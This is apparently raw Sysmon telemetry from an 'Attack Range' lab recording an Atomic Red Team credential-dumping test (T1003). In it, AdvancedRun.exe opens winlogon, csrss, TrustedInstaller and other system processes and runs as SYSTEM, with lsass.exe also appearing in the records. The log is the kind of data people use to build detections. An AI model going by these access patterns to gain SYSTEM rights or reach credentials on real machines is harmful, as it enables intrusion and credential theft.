advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED46-61EA-7703-000000002702}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 